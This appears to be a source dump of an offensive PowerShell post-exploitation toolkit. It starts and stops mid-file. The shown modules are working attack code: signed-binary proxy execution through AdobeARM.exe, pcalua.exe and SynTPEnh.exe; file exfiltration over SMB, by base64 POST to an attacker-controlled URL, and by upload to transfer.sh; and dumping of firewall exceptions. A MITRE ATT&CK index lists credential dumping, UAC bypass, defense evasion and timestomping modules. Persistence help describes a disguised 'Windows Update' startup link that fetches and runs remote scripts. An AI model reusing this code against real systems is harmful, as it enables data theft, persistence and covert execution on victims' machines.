$env:windir\system32\winrm.vbs. Execution failed." 506 | $h 507 | } 508 | } 509 | 510 | elseif ($SignedProxyDll -and $Method -eq 1 -and $Dll) { 511 | $h = "`n### Invoke-Execute(SignedProxyDll) ###`n" 512 | 513 | $AdobeArmExe = (Get-Item 'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe').FullName 514 | 515 | if ($(Test-Path $AdobeArmExe)) { 516 | 517 | (Copy-Item $AdobeArmExe -Destination $env:appdata\AdobeARM.exe) 518 | (Copy-Item $Dll -Destination $env:appdata\AdobeARMENU.dll) 519 | 520 | $command = "$env:appdata\AdobeARM.exe" 521 | Invoke-Expression $command 522 | $h 523 | Write " [+] Executed $Dll using $AdobeArmExe." 524 | $h 525 | } 526 | else { 527 | $h 528 | Write " [-] Can't find the AdobeARM.exe binary." 529 | $h 530 | return 531 | } 532 | } 533 | 534 | elseif ($SignedProxyExe -and $Method -eq 1 -and $Exe) { 535 | $h = "`n### Invoke-Execute(SignedProxyExe) ###`n" 536 | 537 | if (Test-Path C:\??*?\*3?\p?al*?.?x?) { 538 | # https://twitter.com/0rbz_/status/912530504871759872 539 | # https://twitter.com/kylehanslovan/status/912659279806640128 540 | 541 | (C:\??*?\*3?\p?al*?.?x? -a $Exe) 542 | $h 543 | Write " [+] Executed Command: pcalua.exe -a $Exe." 544 | $h 545 | } 546 | else { 547 | $h 548 | Write " [+] Couldn't find pcalua.exe. Quitting." 549 | $h 550 | return 551 | } 552 | } 553 | elseif ($SignedProxyExe -and $Method -eq 2 -and $Exe) { 554 | # https://twitter.com/egre55/status/1052907871749459968 555 | $h = "`n### Invoke-Execute(SignedProxyExe) ###`n" 556 | 557 | $SynTPEnhP = (Get-Item 'C:\Program Files\Synaptics\SynTP\SynTPEnh.exe') 558 | $SynTPEnhS = (Get-Item 'C:\windows\system32\SynTPEnh.exe') 559 | 560 | if ($(Test-Path -Path 'C:\Program Files\Synaptics\SynTP\SynTPEnh.exe')) { 561 | 562 | (Invoke-Expression $SynTPEnhP /SHELLEXEC $Exe) 563 | 564 | $h 565 | Write " [+] Executed Command: $SynTPEnhP /SHELLEXEC $Exe." 566 | $h 567 | } 568 | elseif ($(Test-Path -Path 'C:\windows\system32\SynTPEnh.exe')) { 569 | 570 | (Invoke-Expression $SynTPEnhS /SHELLEXEC $Exe) 571 | 572 | $h 573 | Write " [+] Executed Command: $SynTPEnhS /SHELLEXEC $Exe." 574 | $h 575 | } 576 | else { 577 | $h 578 | Write " [+] Couldn't find SynTPEnh.exe. Quitting." 579 | $h 580 | return 581 | } 582 | } 583 | } -------------------------------------------------------------------------------- /modules/Invoke-Exfil.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Exfil { 2 | <# 3 | 4 | .SYNOPSIS 5 | Methods to allow for moving files off of a target system to a remote system. 6 | 7 | .PARAMETER Help 8 | Shows detailed help for each function. 9 | 10 | .PARAMETER List 11 | Shows summary list of available functions. 12 | 13 | .PARAMETER SmbExfil 14 | Copies a local file over SMB to a remote SMB Server/Share. 15 | 16 | .PARAMETER RestExfil 17 | Uses PowerShell's "Invoke-RestMethod" "POST" to Base64 encode and send a file to an attacker-controlled web server. 18 | 19 | .PARAMETER TransferShExfil 20 | Uploads a file to the https://transfer.sh file upload service. A URL to the file will be returned and is valid for 14 days. "Invoke-WebRequest" and PUT is utilized for this function. 21 | 22 | .PARAMETER InstallScpClient 23 | Installs Windows SSH and SCP clients via a Windows capability package using the Add-WindowsCapability cmdlet and will spawn dismhost.exe as a child-process of powershell. If PowerShell is detected as version 2.0, it will install it with dism.exe. Both options require elevation. 24 | 25 | .EXAMPLE 26 | PS> Invoke-Exfil -SmbExfil -LocalFile C:\temp\data.txt -UncSharePath \\server\share\ 27 | 28 | .EXAMPLE 29 | PS> Invoke-Exfil -RestExfil -LocalFile C:\file -Url https://srv/exfil 30 | 31 | .EXAMPLE 32 | PS> Invoke-Exfil -TransferShExfil -LocalFile C:\file 33 | 34 | .EXAMPLE 35 | PS> Invoke-Exfil -InstallScpClient 36 | 37 | .NOTES 38 | Author: Fabrizio Siciliano (@0rbz_) 39 | 40 | #> 41 | 42 | [CmdletBinding()] 43 | param ( 44 | [Parameter(Position=1)] 45 | [Switch]$Help, 46 | [switch]$List, 47 | 48 | [Parameter(Mandatory = $False)] 49 | [Switch]$SmbExfil, 50 | [String]$UncSharePath, 51 | [String]$LocalFile, 52 | 53 | [Parameter(Mandatory = $False)] 54 | [Switch]$RestExfil, 55 | [String]$LocalFile2=[String]$Localfile, 56 | [String]$Url, 57 | 58 | [Parameter(Mandatory = $False)] 59 | [Switch]$TransferShExfil, 60 | [String]$LocalFile3=[String]$LocalFIle, 61 | 62 | [Parameter(Mandatory = $False)] 63 | [Switch]$InstallScpClient 64 | 65 | ) 66 | 67 | $UAArray = @( 68 | ('Mozilla/4.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/11.0.1245.0 Safari/537.36'), 69 | ('Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0'), 70 | ('Mozilla/4.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19'), 71 | ('Mozilla/5.0 (Macintosh; AMD Mac OS X 10_8_2) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/18.6.872'), 72 | ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36'), 73 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)'), 74 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)'), 75 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)'), 76 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'), 77 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)'), 78 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)'), 79 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)'), 80 | ('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)'), 81 | ('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.7 (KHTML, like Gecko) Version/3.1 Safari/525.7'), 82 | ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0'), 83 | ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.02'), 84 | ('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0') 85 | ) 86 | 87 | $UA = ($UAArray[(get-random -Maximum ([array]$UAArray).count)]) 88 | 89 | if ($Help -eq $True) { 90 | Write @" 91 | 92 | ### Invoke-Exfil Help ### 93 | ------------------------- 94 | Available Invoke-Exfil Commands: 95 | -------------------------------- 96 | |-----------------------------------------------------------------------------| 97 | | -SmbExfil [-LocalFile] local_file [-UncSharePath] Unc share path | 98 | |-----------------------------------------------------------------------------| 99 | 100 | [*] Description: Copies a local file over SMB to a remote SMB Server/Share. 101 | 102 | [*] Usage: Invoke-Exfil -SmbExfil -LocalFile C:\temp\data.txt -UncSharePath \\srv\share\ 103 | 104 | [*] Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 105 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 106 | 107 | |-----------------------------------------------------------------------------| 108 | | -RestExfil [-LocalFile] local_file [-Url] remote_server | 109 | |-----------------------------------------------------------------------------| 110 | 111 | [*] Description: Uses PowerShell's "Invoke-RestMethod" "POST" to Base64 encode 112 | and send a file to an attacker-controlled web server. 113 | 114 | [*] Usage: Invoke-Exfil -RestExfil -LocalFile C:\file -Url https://srv/exfil 115 | 116 | [*] Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 117 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 118 | 119 | |-----------------------------------------------------------------------------| 120 | | -TransferShExfil [-LocalFile] local_file | 121 | |-----------------------------------------------------------------------------| 122 | 123 | [*] Description: Uploads a file to the https://transfer.sh file upload 124 | service. A URL to the file will be returned and is valid for 14 days. 125 | "Invoke-WebRequest" and PUT is utilized for this function. 126 | 127 | [*] Usage: Invoke-Exfil -TransferShExfil -LocalFile C:\file 128 | 129 | [*] Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 130 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 131 | 132 | |-----------------------------------------------------------------------------| 133 | | -InstallScpClient | 134 | |-----------------------------------------------------------------------------| 135 | 136 | [*] Description: Installs Windows SSH and SCP clients via a Windows capability 137 | package using the Add-WindowsCapability cmdlet and will spawn dismhost.exe 138 | as a child-process of powershell. If PowerShell is detected as version 2.0, 139 | it will install it with dism.exe. Both options require elevation. 140 | 141 | [*] Usage: Invoke-Exfil -InstallScpClient 142 | 143 | [*] Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 144 | 145 | |-----------------------------------------------------------------------------| 146 | 147 | "@ 148 | } 149 | elseif ($List -eq $True) { 150 | Write @" 151 | 152 | Invoke-Exfil Command List: 153 | -------------------------- 154 | Invoke-Exfil -SmbExfil -LocalFile C:\temp\data.txt -UncSharePath \\server\share\ 155 | Invoke-Exfil -RestExfil -LocalFile C:\file -Url https://srv/exfil 156 | Invoke-Exfil -TransferShExfil -LocalFile C:\file 157 | Invoke-Exfil -InstallScpClient 158 | 159 | "@ 160 | } 161 | 162 | elseif ($SmbExfil -and $LocalFile -and $UncSharePath) { 163 | 164 | (Copy-Item -Path $LocalFile -Destination $UncSharePath) 165 | 166 | } 167 | elseif ($RestExfil -and $LocalFile -and $Url) { 168 | 169 | if ($PSVersionTable.PSVersion.Major -eq "2") { 170 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 171 | return 172 | } 173 | else { 174 | $Data = Get-Content $LocalFile 175 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Data) 176 | $EncodedData = [Convert]::ToBase64String($Bytes) 177 | 178 | $Headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 179 | $Headers.Add("USER-AGENT", $UA) 180 | 181 | $Request = Invoke-RestMethod $Url -Method Post -Body $EncodedData -Headers $Headers 182 | } 183 | } 184 | elseif ($TransferShExfil -and $LocalFIle) { 185 | 186 | if ($PSVersionTable.PSVersion.Major -eq "2") { 187 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 188 | return 189 | } 190 | else { 191 | $FileName = '.'+(-join ((65..90) + (97..122) | Get-Random -Count 32 | foreach {[char]$_})) 192 | 193 | $Headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 194 | $Headers.Add("USER-AGENT", $UA) 195 | 196 | $Request = (Invoke-WebRequest -Method Put -infile $LocalFile -Headers $Headers https://transfer.sh/$FileName) 197 | 198 | Write " `n[+] Link to file; valid for 14 days --> $Request `n" 199 | } 200 | } 201 | elseif ($InstallScpClient) { 202 | 203 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -and $PSVersionTable.PSVersion.Major -gt "2") { 204 | 205 | Try { 206 | $AvailClient = ((Get-WindowsCapability -Online | 207 | ? Name -Like 'OpenSSH*').Name -like '*Client*') 208 | 209 | (Add-WindowsCapability -Online -Name "$AvailClient") | Out-Null 210 | 211 | if ($((Get-WindowsCapability -Online | ? Name -Like $AvailClient).State -Like "Installed")) { 212 | Write "`n [+] Successfully installed SSH client. SCP is now available.`n" 213 | } 214 | } 215 | Catch { 216 | Write "`n [!] Unknown Error." 217 | } 218 | } 219 | elseif ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) -and $PSVersionTable.PSVersion.Major -eq "2") { 220 | 221 | Try { 222 | (C:\??*?\*3?\?is?.e?e /Online /Add-Capability /CapabilityName:OpenSSH.Client~~~~0.0.1.0) 223 | if ($(Test-Path "C:\windows\system32\OpenSSH\ssh.exe")) { 224 | Write "`n [+] Successfully installed SSH client. SCP is now available.`n" 225 | } 226 | } 227 | Catch { 228 | Write "Unknown Error." 229 | } 230 | } 231 | else { 232 | Write "`n [!] Need admin to execute this function.`n" 233 | } 234 | } 235 | } 236 | 237 | -------------------------------------------------------------------------------- /modules/Invoke-GlassWireExceptions.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-GlasswireExceptions { 2 | <# 3 | 4 | .SYNOPSIS 5 | Dumps any program exceptions configured in GlassWire Endpoint Protection software. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .EXAMPLE 14 | PS> Invoke-GlassWireExceptions 15 | 16 | .NOTES 17 | Author: Fabrizio Siciliano (@0rbz_) 18 | 19 | #> 20 | [CmdletBinding()] 21 | param( 22 | [Parameter(Position=1)] 23 | [Switch]$Help, 24 | [Switch]$List 25 | ) 26 | 27 | if ($Help -or $List) { 28 | Write @" 29 | 30 | ### Invoke-GlasswireExceptions Help ### 31 | --------------------------------------- 32 | Available Invoke-GlasswireExceptions Commands: 33 | ---------------------------------------------- 34 | |--------------------------------------------------------------------------------| 35 | | Invoke-GlasswireExceptions | 36 | |--------------------------------------------------------------------------------| 37 | 38 | [*] Description: Dumps any program exceptions configured in GlassWire Endpoint 39 | Protection software. 40 | 41 | [*] Usage: Invoke-GlasswireExceptions 42 | 43 | \--------------------------------------------------------------------------------/ 44 | 45 | "@ 46 | } 47 | else { 48 | Write "`nGlassWire Exceptions List" 49 | Write "-------------------------`n" 50 | $RegKey = (Get-ItemProperty 'HKLM:\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules') 51 | $RegKey.PSObject.Properties | ForEach-Object { 52 | If($_.Value -like '*Active=TRUE*' -and $_.Value -like '*Allow*' -and $_.Value -like '*Dir=Out|App=*'){ 53 | Write-Output $_.Value | ForEach-Object {$_.split("|")} | Select-String -pattern "^App" 54 | } 55 | } 56 | } 57 | } 58 | 59 | -------------------------------------------------------------------------------- /modules/Invoke-MitreReference.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-MitreReference { 2 | <# 3 | 4 | .SYNOPSIS 5 | Shows a list of Mitre ATT&CK Techniques in use througout the toolkit. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER Tid 14 | Parameter to find in which modules specific Mitre ATT&CK Techniques are in use. Takes a Technique ID number as a value. 15 | 16 | .EXAMPLE 17 | PS> Invoke-MitreReference -List 18 | 19 | .EXAMPLE 20 | PS> Invoke-MitreReference -Tid 1086 21 | 22 | .NOTES 23 | Author: Fabrizio Siciliano (@0rbz_) 24 | 25 | #> 26 | 27 | [CmdletBinding()] 28 | param ( 29 | [Parameter(Position=1)] 30 | [Switch]$Help, 31 | [Switch]$List, 32 | 33 | [Parameter(Mandatory = $False)] 34 | [String]$Tid 35 | ) 36 | 37 | if ($Help -or $List) { 38 | Write @" 39 | 40 | |------------------------------------------------------------------| 41 | | ### MITRE ATT&CK TECHNIQUE REFERENCE ### | 42 | |------------------------------------------------------------------| 43 | | Usage: Invoke-MitreReference -Tid Tid | 44 | | Example: Invoke-MitreReference -Tid 1043 | 45 | |------------------------------------------------------------------| 46 | 47 | Module: Invoke-Connect 48 | ---------------------- 49 | Mitre ATT&CK Ref: T1043 (Commonly Used Port) 50 | Mitre ATT&CK Ref: T1352 (C2 Protocol Development) 51 | 52 | 53 | Module: Invoke-Creds 54 | -------------------- 55 | Mitre ATT&CK Ref: T1056 (Input Capture) 56 | Mitre ATT&CK Ref: T1081 (Credentials in Files) 57 | Mitre ATT&CK Ref: T1003 (Credential Dumping) 58 | 59 | 60 | Module: Invoke-DefenderTools 61 | ---------------------------- 62 | Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 63 | Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 64 | 65 | 66 | Module: Invoke-Download 67 | ----------------------- 68 | Mitre ATT&CK Ref: T1086 (PowerShell) 69 | Mitre ATT&CK Ref: T1105 (Remote File Copy) 70 | 71 | 72 | Module: Invoke-Execute 73 | ---------------------- 74 | Mitre ATT&CK Ref: T1086 (PowerShell) 75 | Mitre ATT&CK Ref: T1059 (Command-Line Interface) 76 | Mitre ATT&CK Ref: T1085 (Rundll32) 77 | Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation) 78 | Mitre ATT&CK Ref: T1220 (XSL Script Processing) 79 | Mitre ATT&CK Ref: T1028 (Windows Remote Management) 80 | Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution) 81 | 82 | 83 | Module: Invoke-Exfil 84 | -------------------- 85 | Mitre ATT&CK Ref: T1132 (Data Encoding) 86 | Mitre ATT&CK Ref: T1020 (Automated Exfiltration) 87 | Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol) 88 | 89 | 90 | Module: Invoke-Persistence 91 | -------------------------- 92 | Mitre ATT&CK Ref: T1060 (Registry Run Keys / Startup Folder) 93 | Mitre ATT&CK Ref: T1090 (Account Manipulation) 94 | Mitre ATT&CK Ref: T1059 (Command-Line Interface) 95 | Mitre ATT&CK Ref: T1136 (Create Account) 96 | Mitre ATT&CK Ref: T1076 (Remote Desktop Protocol) 97 | 98 | 99 | Module: Invoke-PrivEsc 100 | ---------------------- 101 | Mitre ATT&CK Ref: T1122 (Component Object Model Hijacking) 102 | Mitre ATT&CK Ref: T1088 (Bypass User Account Control) 103 | 104 | 105 | Module: New-PsDat 106 | ----------------- 107 | Mitre ATT&CK Ref: T1099 (Timestomp) 108 | 109 | 110 | Module: New-PsTask 111 | ------------------ 112 | MITRE ATT&CK Ref: T1053 (Scheduled Task) 113 | 114 | 115 | Module: Invoke-Sysinfo 116 | ---------------------- 117 | Mitre ATT&CK Ref: T1087 (Account Discovery) 118 | Mitre ATT&CK Ref: T1059 (Command-Line Interface) 119 | Mitre ATT&CK Ref: T1083 (File and Directory Discovery) 120 | Mitre ATT&CK Ref: T1069 (Permission Groups Discovery) 121 | Mitre ATT&CK Ref: T1082 (System Information Discovery) 122 | Mitre ATT&CK Ref: T1016 (System Network Configuration Discovery) 123 | Mitre ATT&CK Ref: T1049 (System Network Connections Discovery) 124 | Mitre ATT&CK Ref: T1007 (System Service Discovery) 125 | Mitre ATT&CK Ref: T1005 (Data from Local System) 126 | Mitre ATT&CK Ref: T1033 (System Owner/User Discovery) 127 | Mitre ATT&CK Ref: T1057 (Process Discovery) 128 | 129 | 130 | Module: Invoke-TimeStomp 131 | ------------------------ 132 | Mitre ATT&CK Ref: T1099 (Timestomp) 133 | 134 | 135 | Module: Invoke-TcpScan 136 | ---------------------- 137 | Mitre ATT&CK Ref: T1423 (Network Service Scanning) 138 | Mitre ATT&CK Ref: TA0008 (Lateral Movement) 139 | Mitre ATT&CK Ref: T1018 (Remote System Discovery) 140 | 141 | "@ 142 | } 143 | elseif ($Tid -eq "1003") { 144 | 145 | Write @" 146 | 147 | Modules using Mitre ATT&CK Ref: T1003 (Credential Dumping): 148 | 149 | [+] Module: Invoke-Creds 150 | 151 | "@ 152 | } 153 | elseif ($Tid -eq "1005") { 154 | Write @" 155 | 156 | Modules using Mitre ATT&CK Ref: T1005 (Data from Local System): 157 | 158 | [+] Module: Invoke-Sysinfo 159 | 160 | "@ 161 | } 162 | elseif ($Tid -eq "1007") { 163 | Write @" 164 | 165 | Modules using Mitre ATT&CK Ref: T1007 (System Service Discovery): 166 | 167 | [+] Module: Invoke-Sysinfo 168 | 169 | "@ 170 | } 171 | elseif ($Tid -eq "1016") { 172 | Write @" 173 | 174 | Modules using Mitre ATT&CK Ref: T1016 (System Network Configuration Discovery): 175 | 176 | [+] Module: Invoke-Sysinfo 177 | 178 | "@ 179 | } 180 | elseif ($Tid -eq "1018") { 181 | Write @" 182 | 183 | Modules using Mitre ATT&CK Ref: T1018 (Remote System Discovery): 184 | 185 | [+] Module: Invoke-TcpScan 186 | 187 | "@ 188 | } 189 | elseif ($Tid -eq "1020") { 190 | Write @" 191 | 192 | Modules using Mitre ATT&CK Ref: T1020 (Automated Exfiltration): 193 | 194 | [+] Module: Invoke-Exfil 195 | 196 | "@ 197 | } 198 | elseif ($Tid -eq "1028") { 199 | Write @" 200 | 201 | Modules using Mitre ATT&CK Ref: T1028 (Windows Remote Management): 202 | 203 | [+] Module: Invoke-Execute 204 | 205 | "@ 206 | } 207 | elseif ($Tid -eq "1033") { 208 | Write @" 209 | 210 | Modules using Mitre ATT&CK Ref: T1033 (System Owner/User Discovery): 211 | 212 | [+] Module: Invoke-Sysinfo 213 | 214 | "@ 215 | } 216 | elseif ($Tid -eq "1043") { 217 | Write @" 218 | 219 | Modules using Mitre ATT&CK Ref: T1043 (Commonly Used Port): 220 | 221 | [+] Module: Invoke-Connect 222 | 223 | "@ 224 | } 225 | elseif ($Tid -eq "1047") { 226 | Write @" 227 | 228 | Modules using Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation): 229 | 230 | [+] Module: Invoke-Execute 231 | 232 | "@ 233 | } 234 | elseif ($Tid -eq "1048") { 235 | Write @" 236 | 237 | Modules using Mitre ATT&CK Ref: T1048 (Exfiltration over Alternative Protocol): 238 | 239 | [+] Module: Invoke-Exfil 240 | 241 | "@ 242 | } 243 | elseif ($Tid -eq "1049") { 244 | Write @" 245 | 246 | Modules using Mitre ATT&CK Ref: T1049 (System Network Connections Discovery): 247 | 248 | [+] Module: Invoke-Sysinfo 249 | 250 | "@ 251 | } 252 | elseif ($Tid -eq "1053") { 253 | Write @" 254 | 255 | Modules using Mitre ATT&CK Ref: T1053 (Scheduled Task): 256 | 257 | [+] Module: New-PsTask 258 | 259 | "@ 260 | } 261 | elseif ($Tid -eq "1056") { 262 | Write @" 263 | 264 | Modules using Mitre ATT&CK Ref: T1056 (Input Capture): 265 | 266 | [+] Module: Invoke-Creds 267 | 268 | "@ 269 | } 270 | elseif ($Tid -eq "1057") { 271 | Write @" 272 | 273 | Modules using Mitre ATT&CK Ref: T1057 (Process Discovery): 274 | 275 | [+] Module: Invoke-Sysinfo 276 | 277 | "@ 278 | } 279 | elseif ($Tid -eq "1059") { 280 | Write @" 281 | 282 | Modules using Mitre ATT&CK Ref: T1059 (Command-Line Interface): 283 | 284 | [+] Module: Invoke-Sysinfo 285 | [+] Module: Invoke-Execute 286 | [+] Module: Invoke-Persistence 287 | 288 | "@ 289 | } 290 | elseif ($Tid -eq "1060") { 291 | Write @" 292 | 293 | Modules using Mitre ATT&CK Ref: T1060 (Registry Run Keys / Startup Folder): 294 | 295 | [+] Module: Invoke-Persistence 296 | 297 | "@ 298 | } 299 | elseif ($Tid -eq "1069") { 300 | Write @" 301 | 302 | Modules using Mitre ATT&CK Ref: T1069 (Permission Groups Discovery): 303 | 304 | [+] Module: Invoke-Sysinfo 305 | 306 | "@ 307 | } 308 | elseif ($Tid -eq "1076") { 309 | Write @" 310 | 311 | Modules using Mitre ATT&CK Ref: T1076 (Remote Desktop Protocol): 312 | 313 | [+] Module: Invoke-Persistence 314 | 315 | "@ 316 | } 317 | elseif ($Tid -eq "1081") { 318 | Write @" 319 | 320 | Modules using Mitre ATT&CK Ref: T1081 (Credentials in Files): 321 | 322 | [+] Module: Invoke-Creds 323 | 324 | "@ 325 | } 326 | elseif ($Tid -eq "1082") { 327 | Write @" 328 | 329 | Modules using Mitre ATT&CK Ref: T1082 (System Information Discovery): 330 | 331 | [+] Module: Invoke-Sysinfo 332 | 333 | "@ 334 | } 335 | elseif ($Tid -eq "1083") { 336 | Write @" 337 | 338 | Modules using Mitre ATT&CK Ref: T1083 (File and Directory Discovery): 339 | 340 | [+] Module: Invoke-Sysinfo 341 | 342 | "@ 343 | } 344 | elseif ($Tid -eq "1085") { 345 | Write @" 346 | 347 | Modules using Mitre ATT&CK Ref: T1085 (Rundll32): 348 | 349 | [+] Module: Invoke-Execute 350 | 351 | "@ 352 | } 353 | elseif ($Tid -eq "1086") { 354 | Write @" 355 | 356 | Modules using Mitre ATT&CK Ref: T1086 (PowerShell): 357 | 358 | [+] Module: Invoke-Download 359 | [+] Module: Invoke-Execute 360 | 361 | "@ 362 | } 363 | elseif ($Tid -eq "1087") { 364 | Write @" 365 | 366 | Modules using Mitre ATT&CK Ref: T1087 (Account Discovery): 367 | 368 | [+] Module: Invoke-Sysinfo 369 | 370 | "@ 371 | } 372 | elseif ($Tid -eq "1088") { 373 | Write @" 374 | 375 | Modules using Mitre ATT&CK Ref: T1088 (Bypass User Account Control): 376 | 377 | [+] Module: Invoke-PrivEsc 378 | 379 | "@ 380 | } 381 | elseif ($Tid -eq "1089") { 382 | Write @" 383 | 384 | Modules using Mitre ATT&CK Ref: T1089 (Disabling Security Tools): 385 | 386 | [+] Module: Invoke-DefenderTools 387 | 388 | "@ 389 | } 390 | elseif ($Tid -eq "1090") { 391 | Write @" 392 | 393 | Modules using Mitre ATT&CK Ref: T1090 (Account Manipulation): 394 | 395 | [+] Module: Invoke-Persistence 396 | 397 | "@ 398 | } 399 | elseif ($Tid -eq "1099") { 400 | Write @" 401 | 402 | Modules using Mitre ATT&CK Ref: T1099 (Timestomp): 403 | 404 | [+] Module: Invoke-TimeStomp 405 | [+] Module: New-PsDat 406 | 407 | "@ 408 | } 409 | elseif ($Tid -eq "1105") { 410 | Write @" 411 | 412 | Modules using Mitre ATT&CK Ref: T1105 (Remote File Copy): 413 | 414 | [+] Module: Invoke-Download 415 | 416 | "@ 417 | } 418 | elseif ($Tid -eq "1122") { 419 | Write @" 420 | 421 | Modules using Mitre ATT&CK Ref: T1122 (Component Object Model Hijacking): 422 | 423 | [+] Module: Invoke-PrivEsc 424 | 425 | "@ 426 | } 427 | elseif ($Tid -eq "1132") { 428 | Write @" 429 | 430 | Modules using Mitre ATT&CK Ref: T1132 (Data Encoding): 431 | 432 | [+] Module: Invoke-Exfil 433 | 434 | "@ 435 | } 436 | elseif ($Tid -eq "1136") { 437 | Write @" 438 | 439 | Modules using Mitre ATT&CK Ref: T1136 (Create Account): 440 | 441 | [+] Module: Invoke-Persistence 442 | 443 | "@ 444 | } 445 | elseif ($Tid -eq "1211") { 446 | Write @" 447 | 448 | Modules using Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion): 449 | 450 | [+] Module: Invoke-DefenderTools 451 | 452 | "@ 453 | } 454 | elseif ($Tid -eq "1218") { 455 | Write @" 456 | 457 | Modules using Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution): 458 | 459 | [+] Module: Invoke-Execute 460 | 461 | "@ 462 | } 463 | elseif ($Tid -eq "1220") { 464 | Write @" 465 | 466 | Modules using Mitre ATT&CK Ref: T1220 (XSL Script Processing): 467 | 468 | [+] Module: Invoke-Execute 469 | 470 | "@ 471 | } 472 | elseif ($Tid -eq "1352") { 473 | Write @" 474 | 475 | Modules using Mitre ATT&CK Ref: T1352 (C2 Protocol Development): 476 | 477 | [+] Module: Invoke-Connect 478 | 479 | "@ 480 | } 481 | elseif ($Tid -eq "1423") { 482 | Write @" 483 | 484 | Modules using Mitre ATT&CK Ref: T1423 (Network Service Scanning): 485 | 486 | [+] Module: Invoke-TcpScan 487 | 488 | "@ 489 | } 490 | } 491 | 492 | -------------------------------------------------------------------------------- /modules/Invoke-Persistence.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Persistence { 2 | <# 3 | 4 | .SYNOPSIS 5 | Several methods that allow persisting on a target system. 6 | 7 | .PARAMETER Help 8 | Shows Detailed Help. 9 | 10 | .PARAMETER List 11 | Shows Brief Command Help. 12 | 13 | .PARAMETER StartupLnk 14 | Drops a .LNK file in the current user's startup directory named "Windows Update" that executes a remotely hosted PowerShell script in memory (Net.WebClient DownloadString). 15 | 16 | If the "-Encoded" parameter is appended to the command line, the downloadstring will be encoded and will use PowerShell's -EncodedCommand function to execute. 17 | 18 | .PARAMETER AddUser 19 | Adds a local user. If the [-Admin] parameter is specified, adds an existing user to the local Administrators group. Use the [-Delete] param to delete a user. (Requires Elevation) 20 | 21 | .PARAMETER EnableRdp 22 | Enables remote desktop on the target, and adds an existing user to the Remote Desktop users group. (Requires Elevation) 23 | 24 | .PARAMETER PsTask 25 | Generates a scheduled task that utilizes Net.Webclient Downloadstring method to a remote PowerShell script. 26 | 27 | .EXAMPLE 28 | PS> Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 29 | 30 | .EXAMPLE 31 | PS> Invoke-Persistence -StartupLnk -PsUrl https://yourserver/script.ps1 -Encoded 32 | 33 | .EXAMPLE 34 | PS> Invoke-Persistence -StartupLnk -Clean 35 | 36 | .EXAMPLE 37 | PS> Invoke-Persistence -AddUser -UserName user2 -password "p@a55wrd" 38 | 